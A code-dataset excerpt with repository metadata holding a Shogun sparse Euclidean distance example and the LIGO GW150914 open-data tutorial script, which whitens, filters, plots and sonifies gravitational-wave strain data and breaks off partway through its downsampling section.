# src = open(src, "r")
# lines = src.readlines()
# src.close()
# return lines
# #Wrapper function to process and clean tsv files
# #Returns tsv back
# def __process(self, tsv):
# tsv = [line.replace("\r\n", "").replace("\n", "") for line in tsv]
# tsv = map(lambda line: line.split("\t"), tsv)
# for line in tsv:
# try:
# line.remove("")
# except:
# pass
# return tsv
|
[
"[email protected]"
] | |
f9520500f015b1f2f85946de085b6dfb1d169031
|
b92b0e9ba2338ab311312dcbbeefcbb7c912fc2e
|
/build/shogun_lib/examples/documented/python_modular/distance_sparseeuclidean_modular.py
|
2e8e098e832784cb39eb330eae2d7c48c0f9148f
|
[] |
no_license
|
behollis/muViewBranch
|
384f8f97f67723b2a4019294854969d6fc1f53e8
|
1d80914f57e47b3ad565c4696861f7b3213675e0
|
refs/heads/master
| 2021-01-10T13:22:28.580069 | 2015-10-27T21:43:20 | 2015-10-27T21:43:20 | 45,059,082 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,057 |
py
|
# In this example a sparse euclidean distance is computed for sparse toy data.
from tools.load import LoadMatrix
lm=LoadMatrix()
traindat = lm.load_numbers('../data/fm_train_real.dat')
testdat = lm.load_numbers('../data/fm_test_real.dat')
parameter_list = [[traindat,testdat],[traindat,testdat]]
def distance_sparseeuclidean_modular (fm_train_real=traindat,fm_test_real=testdat):
from shogun.Features import RealFeatures, SparseRealFeatures
from shogun.Distance import SparseEuclidianDistance
realfeat=RealFeatures(fm_train_real)
feats_train=SparseRealFeatures()
feats_train.obtain_from_simple(realfeat)
realfeat=RealFeatures(fm_test_real)
feats_test=SparseRealFeatures()
feats_test.obtain_from_simple(realfeat)
distance=SparseEuclidianDistance(feats_train, feats_train)
dm_train=distance.get_distance_matrix()
distance.init(feats_train, feats_test)
dm_test=distance.get_distance_matrix()
return distance,dm_train,dm_test
if __name__=='__main__':
print('SparseEuclidianDistance')
distance_sparseeuclidean_modular(*parameter_list[0])
|
[
"prosen@305cdda6-5ce1-45b3-a98d-dfc68c8b3305"
] |
prosen@305cdda6-5ce1-45b3-a98d-dfc68c8b3305
|
338f2eb6af266e51dbd32008647d14094b811fc4
|
c0d312304522defd70997617f8b9288d974001b5
|
/projects/ligo/GW150914_tutorial.py
|
79e1120d82dccdefda0a059369e7098009c43b23
|
[] |
no_license
|
adamw523/ai-north-docker-jupyter
|
312c7e9d2380149a8f2b78aaa63675fe7a4f7fb7
|
9b9ea0b76b83854ba73310c04d578d9bf2ae5dea
|
refs/heads/master
| 2020-04-06T06:53:39.657886 | 2016-09-15T17:58:03 | 2016-09-15T17:58:03 | 64,694,508 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 36,218 |
py
|
# coding: utf-8
# # SIGNAL PROCESSING WITH GW150914 OPEN DATA
#
# Welcome! This ipython notebook (or associated python script GW150914_tutorial.py ) will go through some typical signal processing tasks on strain time-series data associated with the LIGO GW150914 data release from the LIGO Open Science Center (LOSC):
#
# * https://losc.ligo.org/events/GW150914/
#
# * View the tutorial as a web page - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.html/
# * Download the tutorial as a python script - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.py/
# * Download the tutorial as iPython Notebook - https://losc.ligo.org/s/events/GW150914/GW150914_tutorial.ipynb/
#
# To begin, download the ipython notebook, readligo.py, and the data files listed below, into a directory / folder, then run it. Or you can run the python script GW150914_tutorial.py. You will need the python packages: numpy, scipy, matplotlib, h5py.
#
# On Windows, or if you prefer, you can use a python development environment such as Anaconda (https://www.continuum.io/why-anaconda) or Enthought Canopy (https://www.enthought.com/products/canopy/).
#
# Questions, comments, suggestions, corrections, etc: email [email protected]
#
# v20160208b
# ## Intro to signal processing
#
# This tutorial assumes that you know python well enough.
#
# If you know how to use "ipython notebook", use the GW150914_tutorial.ipynb file. Else, you can use the GW150914_tutorial.py script.
#
# This tutorial assumes that you know a bit about signal processing of digital time series data (or want to learn!). This includes power spectral densities, spectrograms, digital filtering, whitening, audio manipulation. This is a vast and complex set of topics, but we will cover many of the basics in this tutorial.
#
# If you are a beginner, here are some resources from the web:
# * http://101science.com/dsp.htm
# * https://georgemdallas.wordpress.com/2014/05/14/wavelets-4-dummies-signal-processing-fourier-transforms-and-heisenberg/
# * https://en.wikipedia.org/wiki/Signal_processing
# * https://en.wikipedia.org/wiki/Spectral_density
# * https://en.wikipedia.org/wiki/Spectrogram
# * http://greenteapress.com/thinkdsp/
# * https://en.wikipedia.org/wiki/Digital_filter
#
# And, well, lots more - google it!
# ## Download the data
#
# * Download the data files from LOSC:
# * We will use the hdf5 files, both H1 and L1, with durations of 32 and 4096 seconds around GW150914, sampled at 16384 and 4096 Hz :
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_4_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_16_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/GW150914_4_NR_waveform.txt
# * Download the python functions to read the data: https://losc.ligo.org/s/sample_code/readligo.py
# * From a unix/mac-osx command line, you can use wget; for example,
# * wget https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126257414-4096.hdf5
# * Put these files in your current directory / folder. Don't mix any other LOSC data files in this directory, or readligo.py may get confused.
#
# Here,
# * "H-H1" means that the data come from the LIGO Hanford Observatory site and the LIGO "H1" datector;
# * the "_4_" means the strain time-series data are (down-)sampled from 16384 Hz to 4096 Hz;
# * the "V1" means version 1 of this data release;
# * "1126257414-4096" means the data starts at GPS time 1126257414 (Mon Sep 14 09:16:37 GMT 2015), duration 4096 seconds;
# * NOTE: GPS time is number of seconds since Jan 6, 1980 GMT. See http://www.oc.nps.edu/oc2902w/gps/timsys.html or https://losc.ligo.org/gps/
# * the filetype "hdf5" means the data are in hdf5 format:
# https://www.hdfgroup.org/HDF5/
#
# Note that the the 4096 second long files at 16384 Hz sampling rate are fairly big files (125 MB).
# You won't need them for this tutorial:
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126257414-4096.hdf5
# * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_4_V1-1126257414-4096.hdf5
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126257414-4096.hdf5
# * https://losc.ligo.org/s/events/GW150914/L-L1_LOSC_16_V1-1126257414-4096.hdf5
#
# In[2]:
# Standard python numerical analysis imports:
import numpy as np
from scipy import signal
from scipy.interpolate import interp1d
from scipy.signal import butter, filtfilt, iirdesign, zpk2tf, freqz
# the ipython magic below must be commented out in the .py file, since it doesn't work.
#get_ipython().magic(u'matplotlib inline')
#get_ipython().magic(u"config InlineBackend.figure_format = 'retina'")
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import h5py
# LIGO-specific readligo.py
import readligo as rl
# **NOTE** that in general, LIGO strain time series data has gaps (filled with NaNs) when the detectors are not taking valid ("science quality") data. Analyzing these data requires the user to loop over "segments" of valid data stretches. In https://losc.ligo.org/segments/ we provide example code to do this.
#
# **However**, the 4096 seconds of released data around GW150914 is one unbroken segment, with no gaps. So for now, we will read it all in and treat it as one valid data segment, ignoring the extra complexity mentioned above.
#
# **This won't work** for other LOSC data releases! See https://losc.ligo.org/segments/ for a more general way to find valid data segments in LOSC data.
# In[3]:
#----------------------------------------------------------------
# Load LIGO data from a single file
#----------------------------------------------------------------
# First from H1
fn_H1 = 'H-H1_LOSC_4_V1-1126259446-32.hdf5'
strain_H1, time_H1, chan_dict_H1 = rl.loaddata(fn_H1, 'H1')
# and then from L1
fn_L1 = 'L-L1_LOSC_4_V1-1126259446-32.hdf5'
strain_L1, time_L1, chan_dict_L1 = rl.loaddata(fn_L1, 'L1')
# sampling rate:
fs = 4096
# both H1 and L1 will have the same time vector, so:
time = time_H1
# the time sample interval (uniformly sampled!)
dt = time[1] - time[0]
# ## Adding a numerical relativity template
#
# Now let's also read in a theoretical (numerical relativity) template,
# generated with parameters favored by the output from the GW150914 parameter estimation (see the GW150914 detection paper, https://dcc.ligo.org/P150914/public ).
#
# This NR template corresponds to the signal expected from a pair of black holes with masses of around 36 and 29 solar masses, merging into a single black hole of 62 solar masses, at a distance of around 410 Mpc.
#
# You can fetch the template time series from the following URL, and put it in your working directory / folder:
# * https://losc.ligo.org/s/events/GW150914/GW150914_4_NR_waveform.txt
#
# In[4]:
# read in the NR template
NRtime, NR_H1 = np.genfromtxt('GW150914_4_NR_waveform.txt').transpose()
# ## First look at the data from H1 and L1
# In[5]:
# First, let's look at the data and print out some stuff:
# this doesn't seem to work for scientific notation:
# np.set_printoptions(precision=4)
print ' time_H1: len, min, mean, max = ', len(time_H1), time_H1.min(), time_H1.mean(), time_H1.max()
print 'strain_H1: len, min, mean, max = ', len(strain_H1), strain_H1.min(),strain_H1.mean(),strain_H1.max()
print 'strain_L1: len, min, mean, max = ', len(strain_L1), strain_L1.min(),strain_L1.mean(),strain_L1.max()
#What's in chan_dict? See https://losc.ligo.org/archive/dataset/GW150914/
bits = chan_dict_H1['DATA']
print 'H1 DATA: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_H1['CBC_CAT1']
print 'H1 CBC_CAT1: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_H1['CBC_CAT2']
print 'H1 CBC_CAT2: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_L1['DATA']
print 'L1 DATA: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_L1['CBC_CAT1']
print 'L1 CBC_CAT1: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
bits = chan_dict_L1['CBC_CAT2']
print 'L1 CBC_CAT2: len, min, mean, max = ', len(bits), bits.min(),bits.mean(),bits.max()
print 'In both H1 and L1, all 32 seconds of data are present (DATA=1), '
print "and all pass data quality (CBC_CAT1=1 and CBC_CAT2=1)."
# In[6]:
# plot +- 5 seconds around the event:
tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015
deltat = 5. # seconds around the event
# index into the strain time series for this time interval:
indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat))
plt.figure()
plt.plot(time_H1[indxt]-tevent,strain_H1[indxt],'r',label='H1 strain')
plt.plot(time_L1[indxt]-tevent,strain_L1[indxt],'g',label='L1 strain')
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('strain')
plt.legend(loc='lower right')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_strain.png')
# The data are dominated by **low frequency noise**; there is no way to see a signal here, without some signal processing.
#
# There are very low frequency oscillations that are putting the mean of the L1 strain at -2.0e-18 at the time around this event, so it appears offset from the H1 strain. These low frequency oscillations are essentially ignored in LIGO data analysis (see bandpassing, below).
#
# We will be "whitening" the data, below.
# ## Data in the Fourier domain - ASDs
#
# Plotting these data in the Fourier domain gives us an idea of the frequency content of the data. A way to visualize the frequency content of the data is to plot the amplitude spectral density, ASD.
#
# The ASDs are the square root of the power spectral densities (PSDs), which are averages of the square of the fast fourier transforms (FFTs) of the data.
#
# They are an estimate of the "strain-equivalent noise" of the detectors versus frequency,
# which limit the ability of the detectors to identify GW signals.
#
# They are in units of strain/rt(Hz).
# So, if you want to know the root-mean-square (rms) strain noise in a frequency band,
# integrate (sum) the squares of the ASD over that band, then take the square-root.
#
# There's a signal in these data!
# For the moment, let's ignore that, and assume it's all noise.
# In[7]:
# number of sample for the fast fourier transform:
NFFT = 1*fs
fmin = 10
fmax = 2000
Pxx_H1, freqs = mlab.psd(strain_H1, Fs = fs, NFFT = NFFT)
Pxx_L1, freqs = mlab.psd(strain_L1, Fs = fs, NFFT = NFFT)
# We will use interpolations of the ASDs computed above for whitening:
psd_H1 = interp1d(freqs, Pxx_H1)
psd_L1 = interp1d(freqs, Pxx_L1)
# plot the ASDs:
plt.figure()
plt.loglog(freqs, np.sqrt(Pxx_H1),'r',label='H1 strain')
plt.loglog(freqs, np.sqrt(Pxx_L1),'g',label='L1 strain')
plt.axis([fmin, fmax, 1e-24, 1e-19])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='upper center')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_ASDs.png')
# NOTE that we only plot the data between fmin = 10 Hz and fmax = 2000 Hz.
#
# Below fmin, the data **are not properly calibrated**. That's OK, because the noise is so high below fmin that LIGO cannot sense gravitational wave strain from astrophysical sources in that band.
#
# The sample rate is fs = 4096 Hz (2^12 Hz), so the data cannot capture frequency content above the Nyquist frequency = fs/2 = 2048 Hz. That's OK, because GW150914 only has detectable frequency content in the range 20 Hz - 300 Hz.
#
# You can see strong spectral lines in the data; they are all of instrumental origin. Some are engineered into the detectors (mirror suspension resonances at ~500 Hz and harmonics, calibration lines, control dither lines, etc) and some (60 Hz and harmonics) are unwanted. We'll return to these, later.
#
# You can't see the signal in this plot, since it is relatively weak and less than a second long, while this plot averages over 32 seconds of data. So this plot is entirely dominated by instrumental noise.
#
# Later on in this tutorial, we'll look at the data sampled at the full 16384 Hz (2^14 Hz).
# ## Whitening
#
# From the ASD above, we can see that the data are very strongly "colored" - noise fluctuations are much larger at low and high frequencies and near spectral lines, reaching a roughly flat ("white") minimum in the band around 80 to 300 Hz.
#
# We can "whiten" the data (dividing it by the noise amplitude spectrum, in the fourier domain), suppressing the extra noise at low frequencies and at the spectral lines, to better see the weak signals in the most sensitive band.
#
# Whitening is always one of the first steps in astrophysical data analysis (searches, parameter estimation).
# Whitening requires no prior knowledge of spectral lines, etc; only the data are needed.
#
# The resulting time series is no longer in units of strain; now in units of "sigmas" away from the mean.
# In[8]:
# function to writen data
def whiten(strain, interp_psd, dt):
Nt = len(strain)
freqs = np.fft.rfftfreq(Nt, dt)
# whitening: transform to freq domain, divide by asd, then transform back,
# taking care to get normalization right.
hf = np.fft.rfft(strain)
white_hf = hf / (np.sqrt(interp_psd(freqs) /dt/2.))
white_ht = np.fft.irfft(white_hf, n=Nt)
return white_ht
# now whiten the data from H1 and L1, and also the NR template:
strain_H1_whiten = whiten(strain_H1,psd_H1,dt)
strain_L1_whiten = whiten(strain_L1,psd_L1,dt)
NR_H1_whiten = whiten(NR_H1,psd_H1,dt)
# Now plot the whitened strain data, along with the best-fit numerical relativity (NR) template.
#
# To get rid of remaining high frequency noise, we will also bandpass the data (see bandpassing, below).
# In[9]:
# We need to suppress the high frequencies with some bandpassing:
bb, ab = butter(4, [20.*2./fs, 300.*2./fs], btype='band')
strain_H1_whitenbp = filtfilt(bb, ab, strain_H1_whiten)
strain_L1_whitenbp = filtfilt(bb, ab, strain_L1_whiten)
NR_H1_whitenbp = filtfilt(bb, ab, NR_H1_whiten)
# plot the data after whitening:
# first, shift L1 by 7 ms, and invert. See the GW150914 detection paper for why!
strain_L1_shift = -np.roll(strain_L1_whitenbp,int(0.007*fs))
plt.figure()
plt.plot(time-tevent,strain_H1_whitenbp,'r',label='H1 strain')
plt.plot(time-tevent,strain_L1_shift,'g',label='L1 strain')
plt.plot(NRtime+0.002,NR_H1_whitenbp,'k',label='matched NR waveform')
plt.xlim([-0.1,0.05])
plt.ylim([-4,4])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('whitented strain')
plt.legend(loc='lower left')
plt.title('Advanced LIGO WHITENED strain data near GW150914')
plt.savefig('GW150914_strain_whitened.png')
# The signal is now clearly visible in the whitened and bandpassed data. The "DC" offset between H1 and L1 data visible in the first plot is no longer visible here; the bandpassing cuts off frequency components below around 20 Hz and above 300 Hz.
#
# The signal is visible as an oscillation sweeping from low to high frequency from -0.10 seconds to 0, then damping down into the random noise.
#
# The signal looks roughly the same in both detectors. We had to shift the L1 data by 7 ms to get it to line up with the data from H1, because the source is roughly in the direction of the line connecting H1 to L1, and the wave travels at the speed of light, so it hits L1 7 ms earlier. Also, the orientation of L1 with respect to H1 means that we have to flip the sign of the signal in L1 for it to match the signal in H1.
#
# It's exactly the kind of signal we expect from the inspiral, merger and ringdown of two massive black holes, as evidenced by the good match with the numerical relativity (NR) waveform, in black.
#
# LIGO uses a rather elaborate software suite to match the data against a family of such signal waveforms ("templates"), to find the best match. This procedure helps LIGO to "optimally" separate signals from instrumental noise, and to infer the parameters of the source (masses, spins, sky location, orbit orientation, etc) from the best match templates.
# ## Spectrograms
#
# Now let's plot a short time-frequency spectrogram around GW150914:
# In[10]:
tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015
deltat = 10. # seconds around the event
# index into the strain time series for this time interval:
indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat))
# pick a shorter FTT time interval, like 1/8 of a second:
NFFT = fs/8
# and with a lot of overlap, to resolve short-time features:
NOVL = NFFT*15/16
# and choose a window that minimizes "spectral leakage"
# (https://en.wikipedia.org/wiki/Spectral_leakage)
window = np.blackman(NFFT)
# the right colormap is all-important! See:
# http://matplotlib.org/examples/color/colormaps_reference.html
# viridis seems to be the best for our purposes, but it's new; if you don't have it, you can settle for ocean.
spec_cmap='viridis'
#spec_cmap='ocean'
# Plot the H1 spectrogram:
plt.figure()
spec_H1, freqs, bins, im = plt.specgram(strain_H1[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-deltat, deltat, 0, 2000])
plt.title('aLIGO H1 strain data near GW150914')
plt.savefig('GW150914_H1_spectrogram.png')
# Plot the L1 spectrogram:
plt.figure()
spec_H1, freqs, bins, im = plt.specgram(strain_L1[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-deltat, deltat, 0, 2000])
plt.title('aLIGO L1 strain data near GW150914')
plt.savefig('GW150914_L1_spectrogram.png')
# In the above spectrograms, you can see lots of excess power below ~20 Hz, as well as strong spectral lines at 500, 1000, 1500 Hz (also evident in the ASDs above). The lines at multiples of 500 Hz are the harmonics of the "violin modes" of the fibers holding up the mirrors of the LIGO interferometers.
#
# The signal is just bately visible here, at time=0 and below 500 Hz. We need to zoom in around the event time, and to the frequency range from [20, 400] Hz, and use the whitened data generated above.
# In[11]:
# plot the whitened data, zooming in on the signal region:
tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015
deltat = 10. # seconds around the event
# index into the strain time series for this time interval:
indxt = np.where((time_H1 >= tevent-deltat) & (time_H1 < tevent+deltat))
# pick a shorter FTT time interval, like 1/16 of a second:
NFFT = fs/16
# and with a lot of overlap, to resolve short-time features:
NOVL = NFFT*15/16
# and choose a window that minimizes "spectral leakage"
# (https://en.wikipedia.org/wiki/Spectral_leakage)
window = np.blackman(NFFT)
# Plot the H1 whitened spectrogram around the signal
plt.figure()
spec_H1, freqs, bins, im = plt.specgram(strain_H1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-0.5, 0.5, 0, 500])
plt.title('aLIGO H1 strain data near GW150914')
plt.savefig('GW150914_H1_spectrogram_whitened.png')
# Plot the L1 whitened spectrogram around the signal
plt.figure()
spec_H1, freqs, bins, im = plt.specgram(strain_L1_whiten[indxt], NFFT=NFFT, Fs=fs, window=window,
noverlap=NOVL, cmap=spec_cmap, xextent=[-deltat,deltat])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('Frequency (Hz)')
plt.colorbar()
plt.axis([-0.5, 0.5, 0, 500])
plt.title('aLIGO L1 strain data near GW150914')
plt.savefig('GW150914_L1_spectrogram_whitened.png')
# See the smudge between -0.2 and 0 seconds? That's our signal!
# You can see it 'chirping' from lower to higher frequency over a small fraction of a second.
# ## Time-domain filtering - Bandpassing+notching
#
# Now let's filter the signal in the time domain, using bandpassing to reveal the signal in the frequency band [40 , 300 Hz], and notching of spectral lines to remove those noise sources from the data.
# In[12]:
# generate linear time-domain filter coefficients, common to both H1 and L1.
# First, define some functions:
# This function will generate digital filter coefficients for bandstops (notches).
# Understanding it requires some signal processing expertise, which we won't get into here.
def iir_bandstops(fstops, fs, order=4):
"""ellip notch filter
fstops is a list of entries of the form [frequency (Hz), df, df2]
where df is the pass width and df2 is the stop width (narrower
than the pass width). Use caution if passing more than one freq at a time,
because the filter response might behave in ways you don't expect.
"""
nyq = 0.5 * fs
# Zeros zd, poles pd, and gain kd for the digital filter
zd = np.array([])
pd = np.array([])
kd = 1
# Notches
for fstopData in fstops:
fstop = fstopData[0]
df = fstopData[1]
df2 = fstopData[2]
low = (fstop - df) / nyq
high = (fstop + df) / nyq
low2 = (fstop - df2) / nyq
high2 = (fstop + df2) / nyq
z, p, k = iirdesign([low,high], [low2,high2], gpass=1, gstop=6,
ftype='ellip', output='zpk')
zd = np.append(zd,z)
pd = np.append(pd,p)
# Set gain to one at 100 Hz...better not notch there
bPrelim,aPrelim = zpk2tf(zd, pd, 1)
outFreq, outg0 = freqz(bPrelim, aPrelim, 100/nyq)
# Return the numerator and denominator of the digital filter
b,a = zpk2tf(zd,pd,k)
return b, a
def get_filter_coefs(fs):
# assemble the filter b,a coefficients:
coefs = []
# bandpass filter parameters
lowcut=43
highcut=260
order = 4
# bandpass filter coefficients
nyq = 0.5*fs
low = lowcut / nyq
high = highcut / nyq
bb, ab = butter(order, [low, high], btype='band')
coefs.append((bb,ab))
# Frequencies of notches at known instrumental spectral line frequencies.
# You can see these lines in the ASD above, so it is straightforward to make this list.
notchesAbsolute = np.array(
[14.0,34.70, 35.30, 35.90, 36.70, 37.30, 40.95, 60.00,
120.00, 179.99, 304.99, 331.49, 510.02, 1009.99])
# notch filter coefficients:
for notchf in notchesAbsolute:
bn, an = iir_bandstops(np.array([[notchf,1,0.1]]), fs, order=4)
coefs.append((bn,an))
# Manually do a wider notch filter around 510 Hz etc.
bn, an = iir_bandstops(np.array([[510,200,20]]), fs, order=4)
coefs.append((bn, an))
# also notch out the forest of lines around 331.5 Hz
bn, an = iir_bandstops(np.array([[331.5,10,1]]), fs, order=4)
coefs.append((bn, an))
return coefs
# and then define the filter function:
def filter_data(data_in,coefs):
data = data_in.copy()
for coef in coefs:
b,a = coef
# filtfilt applies a linear filter twice, once forward and once backwards.
# The combined filter has linear phase.
data = filtfilt(b, a, data)
return data
# To visualize the effect of this filter, let's generate "white" gaussian noise, and filter it.
# In[13]:
# get filter coefficients
coefs = get_filter_coefs(fs)
# generate random gaussian "data"
data = np.random.randn(128*fs)
# filter it:
resp = filter_data(data,coefs)
# compute the amplitude spectral density (ASD) of the original data, and the filtered data:
NFFT = fs/2
Pxx_data, freqs = mlab.psd(data, Fs = fs, NFFT = NFFT)
Pxx_resp, freqs = mlab.psd(resp, Fs = fs, NFFT = NFFT)
# The asd is the square root; and let's normalize it to 1:
norm = np.sqrt(Pxx_data).mean()
asd_data = np.sqrt(Pxx_data)/norm
asd_resp = np.sqrt(Pxx_resp)/norm
# get the predicted filter frequency response using signal.freqz:
Nc = 2000
filt_resp = np.ones(Nc)
for coef in coefs:
b,a = coef
w,r = signal.freqz(b,a,worN=Nc)
filt_resp = filt_resp*np.abs(r)
freqf = (fs * 0.5 / np.pi) * w
# We "double pass" the filtering using filtfilt, so we square the filter response
filt_resp = filt_resp**2
# plot the ASDs
plt.figure()
plt.plot(freqs, asd_data,'b',label='white noise')
plt.plot(freqs, asd_resp,'m',label='filtered white noise')
plt.plot(freqf, filt_resp,'k--',label='filter response')
plt.xlim([0,600])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='center right')
plt.savefig('GW150914_filter.png')
# From the above, you can see that the gaussian noise (blue) is "white" - it is flat in frequency (all the way up to Nyquist frequency of 2048 Hz, but we'lve cut it off at 600 Hz to see the effect of filtering). You can see in the filtered data (magenta) the effects of the bandpassing and the notches.
#
# Now let's filter the data, and plot the results:
# In[14]:
# filter the data:
strain_H1_filt = filter_data(strain_H1, coefs)
strain_L1_filt = filter_data(strain_L1, coefs)
# filter NR template as we do with the data:
NR_H1_filt = filter_data(NR_H1, coefs)
# plot the data prior to filtering:
plt.figure()
plt.plot(time-tevent,strain_H1,'r',label='H1 strain')
plt.plot(time-tevent,strain_L1,'g',label='L1 strain')
plt.xlim([-0.2,0.1])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('strain')
plt.legend(loc='lower right')
plt.title('aLIGO strain data near GW150914')
plt.savefig('GW150914_H1_strain_unfiltered.png')
# plot the data after filtering:
# first, shift L1 by 7 ms, and invert. See the GW150914 detection paper for why!
strain_L1_fils = -np.roll(strain_L1_filt,int(0.007*fs))
# We also have to shift the NR template by 2 ms to get it to line up properly with the data
plt.figure()
plt.plot(time-tevent,strain_H1_filt,'r',label='H1 strain')
plt.plot(time-tevent,strain_L1_fils,'g',label='L1 strain')
plt.plot(NRtime+0.002,NR_H1_filt,'k',label='matched NR waveform')
plt.xlim([-0.2,0.1])
plt.ylim([-1.5e-21,1.5e-21])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('strain')
plt.legend(loc='lower left')
plt.title('aLIGO FILTERED strain data near GW150914')
plt.savefig('GW150914_H1_strain_filtered.png')
# The filtered data peak at around 1.e-21, 1000 times smaller than the scale in the first plot. The "DC" offset between H1 and L1 data visible in the first plot is no longer visible here; the bandpassing cuts off frequency components below around 40 Hz.
#
# Now, as with whitening, the signal is visible as an oscillation sweeping from low to high frequency from -0.10 seconds to 0, then damping down into the random noise. Again, it looks roughly the same in both detectors, after shifting and flipping the L1 data with respect to H1. It's exactly the kind of signal we expect from the inspiral, merger and ringdown of two massive black holes.
#
# And as with whitening, the NR waveform looks, by eye, to be a good match to the data in both detectors; the signal is consistent with the waveform predicted from General Relativity.
# ## Make sound files
#
# Make wav (sound) files from the filtered, downsampled data, +-2s around the event.
# In[15]:
# make wav (sound) files from the whitened data, +-2s around the event.
from scipy.io import wavfile
# function to keep the data within integer limits, and write to wavfile:
def write_wavfile(filename,fs,data):
d = np.int16(data/np.max(np.abs(data)) * 32767 * 0.9)
wavfile.write(filename,int(fs), d)
tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015
deltat = 2. # seconds around the event
# index into the strain time series for this time interval:
indxt = np.where((time >= tevent-deltat) & (time < tevent+deltat))
# write the files:
write_wavfile("GW150914_H1_whitenbp.wav",int(fs), strain_H1_whitenbp[indxt])
write_wavfile("GW150914_L1_whitenbp.wav",int(fs), strain_L1_whitenbp[indxt])
write_wavfile("GW150914_NR_whitenbp.wav",int(fs), NR_H1_whitenbp)
# With good headphones, you'll hear a faint thump in the middle.
#
# We can enhance this by increasing the frequency;
# this is the "audio" equivalent of the enhanced visuals that NASA employs on telescope images with "false color".
#
# The code below will shift the data up by 400 Hz (by taking an FFT, shifting/rolling the frequency series, then inverse fft-ing). The resulting sound file will be noticibly more high-pitched, and the signal will be easier to hear.
# In[16]:
# function that shifts frequency of a band-passed signal
def reqshift(data,fshift=100,sample_rate=4096):
"""Frequency shift the signal by constant
"""
x = np.fft.rfft(data)
T = len(data)/float(sample_rate)
df = 1.0/T
nbins = int(fshift/df)
# print T,df,nbins,x.real.shape
y = np.roll(x.real,nbins) + 1j*np.roll(x.imag,nbins)
z = np.fft.irfft(y)
return z
# parameters for frequency shift
fs = 4096
fshift = 400.
speedup = 1.
fss = int(float(fs)*float(speedup))
# shift frequency of the data
strain_H1_shifted = reqshift(strain_H1_whitenbp,fshift=fshift,sample_rate=fs)
strain_L1_shifted = reqshift(strain_L1_whitenbp,fshift=fshift,sample_rate=fs)
NR_H1_shifted = reqshift(NR_H1_whitenbp,fshift=fshift,sample_rate=fs)
# write the files:
write_wavfile("GW150914_H1_shifted.wav",int(fs), strain_H1_shifted[indxt])
write_wavfile("GW150914_L1_shifted.wav",int(fs), strain_L1_shifted[indxt])
write_wavfile("GW150914_NR_shifted.wav",int(fs), NR_H1_shifted)
# ## Downsampling from 16384 Hz to 4096 Hz
#
# So far, we have been working with data sampled at fs=4096 Hz. This is entirely sufficient for signals with no frequency content above f_Nyquist = fs/2 = 2048 Hz, such as GW150914.
#
# We downsample to 4096 Hz to save on download time, disk space, and memory requirements. If, however, you are interested in signals with frequency content above 2048 Hz, you need the data sampled at the full rate of 16384 Hz.
#
# Here we demonstrate how to do that downsampling, and how it might limit you is you are interested in frequency content near 2048 Hz and above.
#
# First, download a LOSC data file containing 32 seconds of data at the full 16384 Hz rate, and another downsampled at 4096 Hs, and put them in your working directory / folder:
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126259446-32.hdf5
# In[17]:
# read in the data at 16384 Hz and at 4096 Hz:
fn_16 = 'H-H1_LOSC_16_V1-1126259446-32.hdf5'
strain_16, time_16, chan_dict = rl.loaddata(fn_16, 'H1')
fn_4 = 'H-H1_LOSC_4_V1-1126259446-32.hdf5'
strain_4, time_4, chan_dict = rl.loaddata(fn_4, 'H1')
# Make PSDs of each:
fs = 16384
NFFT = 1*fs
Pxx_16, freqs_16 = mlab.psd(strain_16, Fs = fs, NFFT = NFFT)
fs = 4096
NFFT = 1*fs
